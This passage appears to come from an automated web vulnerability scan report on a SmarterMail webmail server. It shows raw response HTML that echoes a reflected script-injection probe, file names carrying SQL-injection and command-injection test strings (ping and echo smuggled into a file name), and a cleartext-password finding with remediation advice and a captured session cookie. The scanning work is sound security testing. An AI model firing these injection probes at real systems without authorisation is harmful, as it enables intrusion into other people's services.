           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="960abe5fe0354582bb229c7a38ca53d3" />
   <input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="884f7&lt;script>alert(1)&lt;/script>aeedac4eebe" />
   <input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="testit" />
   <input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
   <div id="ctl00_MPH_GridUpdatePanel">
   
           <span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
   <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
       <li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
       <li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
       <li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
   </ul>
   <div class='hmScrollDown'></div></div>
   </div>
   </span>
           
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_FilesGridCheckAll" name="ctl00$MPH$FilesGridCheckAll" /></th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$FilesGrid','sort=filename asc')">Filename</a></th><th scope="col" class="ar leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$FilesGrid','sort=size asc')">Size</a></th><th scope="col" class="ac nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$FilesGrid','sort=dateadded asc')">Date Added</a></th><th scope="col" class="rc ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$FilesGrid','sort=published asc')">Public</a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_YzI2MTcyNTUtNzQ0MC00OWZiLWFiMWUtZDhmNWU2YWIwNWE0" name="ctl00_MPH_FilesGrid_CB64_YzI2MTcyNTUtNzQ0MC00OWZiLWFiMWUtZDhmNWU2YWIwNWE0" /></td><td class="leftpad">70acfb30a629f500595b3bfe</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_NzJmYTkyYTEtNDI0ZC00MWM5LTg0ZDktNjZmNmNjZTNlZGZi" name="ctl00_MPH_FilesGrid_CB64_NzJmYTkyYTEtNDI0ZC00MWM5LTg0ZDktNjZmNmNjZTNlZGZi" /></td><td class="leftpad">vulntyps.png</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_ZjhhNGQxZDMtYWVkYy00MjMzLWJmNTYtODAwM2YxMGVhYTRi" name="ctl00_MPH_FilesGrid_CB64_ZjhhNGQxZDMtYWVkYy00MjMzLWJmNTYtODAwM2YxMGVhYTRi" /></td><td class="leftpad">vulntyps.png'</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_MzE5NDFkMTItMzJiMC00MTE1LTg2MjMtZjg0M2I1MTBmNGQx" name="ctl00_MPH_FilesGrid_CB64_MzE5NDFkMTItMzJiMC00MTE1LTg2MjMtZjg0M2I1MTBmNGQx" /></td><td class="leftpad">vulntyps.png' and 1=1-- </td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_ZTFiNGFhYWQtMjc3Ny00YTdmLWJjYTQtZTQ4ODliNzY2MDZl" name="ctl00_MPH_FilesGrid_CB64_ZTFiNGFhYWQtMjc3Ny00YTdmLWJjYTQtZTQ4ODliNzY2MDZl" /></td><td class="leftpad">vulntyps.png' and 1=2-- </td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_NGNkMzkzOTgtM2I4Mi00NDkxLWE5YTMtODllNTYwMWI5ZDdh" name="ctl00_MPH_FilesGrid_CB64_NGNkMzkzOTgtM2I4Mi00NDkxLWE5YTMtODllNTYwMWI5ZDdh" /></td><td class="leftpad">vulntyps.png%27</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_OGI5Yzg5MWMtNDA5My00Y2FiLWFlZTItYjljNWMwZjVjNzQ2" name="ctl00_MPH_FilesGrid_CB64_OGI5Yzg5MWMtNDA5My00Y2FiLWFlZTItYjljNWMwZjVjNzQ2" /></td><td class="leftpad">vulntyps.png&echo b46173b5b376e06c d3ddc2e4919f1749&</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_M2NhYmZhNGEtMzZhNC00NjA1LTgzYWMtYzViYzUzZTkxMTUw" name="ctl00_MPH_FilesGrid_CB64_M2NhYmZhNGEtMzZhNC00NjA1LTgzYWMtYzViYzUzZTkxMTUw" /></td><td class="leftpad">vulntyps.png&ping -n 20 127.0.0.1&</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_OWY0Mjk4NmEtMzMzNS00MmI3LWE0ZTItMjZlYTkwZGM0MDU0" name="ctl00_MPH_FilesGrid_CB64_OWY0Mjk4NmEtMzMzNS00MmI3LWE0ZTItMjZlYTkwZGM0MDU0" /></td><td class="leftpad">vulntyps.png`ping -c 20 127.0.0.1`</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_M2Y0NDcwZWItZDViZi00OTIxLWE1MjUtYWJkMmNiYjgyMmI5" name="ctl00_MPH_FilesGrid_CB64_M2Y0NDcwZWItZDViZi00OTIxLWE1MjUtYWJkMmNiYjgyMmI5" /></td><td class="leftpad">vulntyps.png10055477' or 1=1-- </td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_OTE2NGMzOTYtMTRjMi00ZTVkLThmOTQtMWZhNzdjODdlY2Y4" name="ctl00_MPH_FilesGrid_CB64_OTE2NGMzOTYtMTRjMi00ZTVkLThmOTQtMWZhNzdjODdlY2Y4" /></td><td class="leftpad">vulntyps.png10055477' or 1=2-- </td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
<tr class="lastrow alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_FilesGrid_CB64_ODE1MDE5Y2YtMGQyZi00MDQyLTlmMzEtMmVjYTI2MmEwMTRj" name="ctl00_MPH_FilesGrid_CB64_ODE1MDE5Y2YtMGQyZi00MDQyLTlmMzEtMmVjYTI2MmEwMTRj" /></td><td class="leftpad">vulntyps.png70acfb3042fedd1cf91f51e4</td><td class="ar leftpad">46 KB</td><td class="ac nw leftpad">10/2/2010</td><td class="rc ac leftpad"><input type='checkbox' disabled='true' /></td></tr>
</tbody>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>

           <a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
       
</div>

       </div>
       
   <div id="ctl00_OMPH_AttachmentsAreaPanel">
       <div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
           <div class='plupload_scroll'>
               <div class="plupload_content">
                   <div class="plupload_filelist_header">
                       <div class="plupload_file_name">
                           Filename</div>
                       <div class="plupload_file_action">
                           &nbsp;</div>
                       <div class="plupload_file_status">
                           <span>
                               Status</span></div>
                       <div class="plupload_file_size">
                           Size</div>
                       <div class="plupload_clearer">
                           &nbsp;</div>
                   </div>
                   <div class="plupload_filelist">
                       <ul id="uploader_filelist" class="plupload_filelist2">
                       </ul>
                       <ul class="plupload_filelist1">
                           
                       </ul>
                   </div>
               </div>
           </div>
       </div>
   </div>

       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function updateGrid() {
           __doPostBack('ctl00$MPH$UpdateGridButton','');
       }
       
       function DoubleClick(url) {
           SpawnHyperWindow(url, 427, 275, updateGrid);
       }
       
       function CheckForRows()
       {
           var grid = self.ctl00_MPH_FilesGrid;
           
           if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
           
           __doPostBack('ctl00$BPH$DownloadButton','')        
       }
   </script>

   <script type="text/javascript">
       var uploadButtonClientID = "ctl00_BPH_UploadButton";

       var uploader, uploaderTarget, uploaderId;
       var WebPathVirtualAppPath = "/";
       var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
       var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
       var Text_KB = "KB";
       var Text_MB = "MB";
       var Text_B = "B";
       var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
       var isBusy = false;
       var ErrorText = "Error";
       var activeUploadRuntime = '';

       document.AdditionalResizeEvent = resizePage;

       var resizePage = function() {
           if(uploader && uploader.files.length > 0)
           {
               if ($('#AttachmentsArea').css('display') != 'none') {
                   scrollableSize = $('#Scrollable').outerHeight();
                   scrollableSize -= $('#AttachmentsArea').outerHeight();
                   $('#Scrollable').height(scrollableSize);
               }    
           }
       }

       var initUploader = function() {
           uploaderTarget = $(this);
           uploaderId = uploaderTarget.attr('id');

           if (!uploaderId) {
               uploaderId = plupload.guid();
               uploaderTarget.attr('id', uploaderId);
           }

           uploader = new plupload.Uploader({
               runtimes: 'flash,html5,html4',
               browse_button: uploadButtonClientID,
               container: uploadButtonClientID,
               chunk_size: '100kb',
               max_file_size: 10485760,
               filters: [{ title: "All Files", extensions: "*"}],
               url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=960abe5fe0354582bb229c7a38ca53d3&pathField=884f7%3cscript%3ealert(1)%3c%2fscript%3eaeedac4eebe&userField=testit&domainField=hoytllc.com",
               flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
               silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
           });

           uploader.bind("UploadFile", function(up, file) {
               $('#' + file.id).addClass('plupload_uploading');
           });

           uploader.bind('FileUploaded', function(up, file) {
               updateList(false);
           });

           uploader.bind('FilesAdded', function(up, files) {
               var alertShown = false;
               $.each(files, function(i, file) {
                   if (file.size > uploader.settings.max_file_size && !alertShown) {
                       ShowAlertWindow(Message_AttachmentTooLarge);
                       alertShown = true;
                   }
                   else if (file.size == 0 && !alertShown) {
                       ShowAlertWindow(Message_AttachmentZeroBytes);
                       alertShown = true;
                   }
               });
           });

           uploader.bind("Error", function(up, err) {
               var file = err.file, message;
               if (file) {
                   message = err.message;
                   if (err.details) {
                       message += " (" + err.details + ")";
                   }
                   updateList(false);
               }
           });

           uploader.bind('QueueChanged', function(up) {
               if (uploader.files.length > 0)
                   ShowAttachentsArea(true, true);
               if (updateList(true)) {
                   uploader.start();
               }
           });

           uploader.bind('UploadProgress', function(up, file) {
               isBusy = true;
               
               updateList(false);
               busyTimeout = window.setTimeout("isBusy = false;", 5000);
           });

           uploader.bind('StateChanged', function() {
               updateList(false);
           });

           uploader.init();
       };

       function updateList(scrolldown) {
           var retVal = false;
           var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
           var fileListHtmlInProgress = "";
           var fileListHtmlInQueue = "";
           var fileListHtmlCompleted = "";

           $.each(uploader.files, function(i, file) {
               inputHTML = '';

               if (file.status == plupload.DONE || file.status == plupload.FAILED) {
                   if (file.target_name) {
                       inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
                   }
                   inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
                   inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
                   inputCount++;
               }
               else if (file.status == plupload.STOPPED)
                   retVal = true;
                   
               var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
               
               if (file.status == plupload.QUEUED)
                   fileListHtmlInQueue += text;
               else if (file.status == plupload.UPLOADING)
                   fileListHtmlInProgress += text;
               else
                   fileListHtmlCompleted += text;
           });

           fileList.append(fileListHtmlInProgress);
           fileList.append(fileListHtmlInQueue);
           fileList.append(fileListHtmlCompleted);

           fileList[0].scrollTop = 0;

           if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
               uploader.stop();
               updateGrid();

               if (uploader.total.failed == 0)
                   ShowAttachentsArea(false, true);
               else if(!top.confirmRadWindow)
                   ShowAlertWindow(GenericUploadError);
           }

           return retVal;
       }

       function generateUploadListItem(id, name, percent, size, extraHtml, status) {
           var sizeString;

           if (activeUploadRuntime == 'html4') {
               sizeString = "Unknown";
           }
           else if (size > 10485760)
               sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
           else if (size > 1024)
               sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
           else
               sizeString = size + " " + Text_B;

           var actionClass = "";

           switch (status) {
               case plupload.DONE: actionClass = 'plupload_done'; break;
               case plupload.FAILED: actionClass = 'plupload_failed'; break;
               case plupload.QUEUED: actionClass = 'plupload_queued'; break;
               case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
               default: actionClass = 'plupload_failed'; break;
           }
           
           if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
               actionClass = 'plupload_uploading';

           var percentText = status != plupload.FAILED ? percent + '%' : ErrorText;

           return '<li id="' + id + '" class="' + actionClass + '">' +
               '<div class="plupload_file_name">' + name + '</div>' +
               '<div class="plupload_file_status">' + percentText + '</div>' +
               '<div class="plupload_file_size">' + sizeString + '</div>' +
               '<div class="plupload_clearer">&nbsp;</div>' + extraHtml +
           '</li>';
       }

       function ShowAttachentsArea(show, doresize) {
           $('#AttachmentsArea').css('display', show ? '' : 'none').css('height', '');
           if (doresize)
               document.ResizeEvent();
       }
       
   </script>

   <div id="ctl00_Scripts_UploaderPanel">
   
           

               <script type="text/javascript">
                   $(document).ready(initUploader);
               </script>

           
       
</div>
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask=Specific/plupload"></script>

   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl01(evt) {
   $('#ctl00_MPH_ctl01').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmStoredFiles\x2easpx?path\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe'); });
var ctl00_MPH_FilesGrid_Url13218 = new Array();
ctl00_MPH_FilesGrid_Url13218[0] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3dc2617255\x2d7440\x2d49fb\x2dab1e\x2dd8f5e6ab05a4';
ctl00_MPH_FilesGrid_Url13218[1] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d72fa92a1\x2d424d\x2d41c9\x2d84d9\x2d66f6cce3edfb';
ctl00_MPH_FilesGrid_Url13218[2] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3df8a4d1d3\x2daedc\x2d4233\x2dbf56\x2d8003f10eaa4b';
ctl00_MPH_FilesGrid_Url13218[3] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d31941d12\x2d32b0\x2d4115\x2d8623\x2df843b510f4d1';
ctl00_MPH_FilesGrid_Url13218[4] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3de1b4aaad\x2d2777\x2d4a7f\x2dbca4\x2de4889b76606e';
ctl00_MPH_FilesGrid_Url13218[5] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d4cd39398\x2d3b82\x2d4491\x2da9a3\x2d89e5601b9d7a';
ctl00_MPH_FilesGrid_Url13218[6] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d8b9c891c\x2d4093\x2d4cab\x2daee2\x2db9c5c0f5c746';
ctl00_MPH_FilesGrid_Url13218[7] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d3cabfa4a\x2d36a4\x2d4605\x2d83ac\x2dc5bc53e91150';
ctl00_MPH_FilesGrid_Url13218[8] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d9f42986a\x2d3335\x2d42b7\x2da4e2\x2d26ea90dc4054';
ctl00_MPH_FilesGrid_Url13218[9] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d3f4470eb\x2dd5bf\x2d4921\x2da525\x2dabd2cbb822b9';
ctl00_MPH_FilesGrid_Url13218[10] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d9164c396\x2d14c2\x2d4e5d\x2d8f94\x2d1fa77c87ecf8';
ctl00_MPH_FilesGrid_Url13218[11] = '\x2fMain\x2ffrmStoredFile\x2easpx\x3fpath\x3d884f7\x253cscript\x253ealert\x281\x29\x253c\x252fscript\x253eaeedac4eebe\x26ID\x3d815019cf\x2d0d2f\x2d4042\x2d9f31\x2d2eca262a014c';
var ctl00_MPH_FilesGrid;
function DelayedSetupctl00_MPH_FilesGrid() {
   ctl00_MPH_FilesGrid = new HyperGrid('ctl00_MPH_FilesGrid', true, '', 'Url13218', '', null, 0, ShowContextMenu_ctl00_MPH_ctl01, DoubleClick, null, true, 1, '\x7b0\x7d\x20selected\x20items',false, 'StorageWrapper', {});
   ctl00_MPH_FilesGrid.AddUrlColumn('Url13218',ctl00_MPH_FilesGrid_Url13218);
   ctl00_MPH_FilesGrid.AutoSelect();
   ctl00_MPH_FilesGrid.Focus();
}
if (self.ctl00_MPH_FilesGridHGIsCallback)
   DelayedSetupctl00_MPH_FilesGrid();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_FilesGrid, 100);});
self.ctl00_MPH_FilesGridHGIsCallback = true;
Sys.Application.initialize();
$(function() { SetTopTitle('884f7\x3cscript\x3ealert\x281\x29\x3c\x2fscript\x3eaeedac4eebe\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
function DoEdit_ctl00_BPH_PublishButton() {
   if(self.ctl00_MPH_FilesGrid == null || !self.ctl00_MPH_FilesGrid.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_FilesGrid.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_FilesGrid.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_FilesGrid; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_FilesGrid.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You can not edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_DeleteButton() {
   if (!self.ctl00_MPH_FilesGrid) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_FilesGrid.GetSelectedRowCount ? ctl00_MPH_FilesGrid.GetSelectedRowCount() : ctl00_MPH_FilesGrid.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_DeleteButton);
}
function DoDelete_ctl00_BPH_DeleteButton() { __doPostBack('ctl00$BPH$DeleteButton',''); }
$(function() { $('#ctl00_MPH_ctl01').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl01_hm0":"DoEdit_ctl00_BPH_PublishButton();","ctl00_MPH_ctl01_hm1":"DoDeleteQuery_ctl00_BPH_DeleteButton();","ctl00_MPH_ctl01_hm2":"CheckForRows();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


3. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:02:44 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56960



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmMySettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 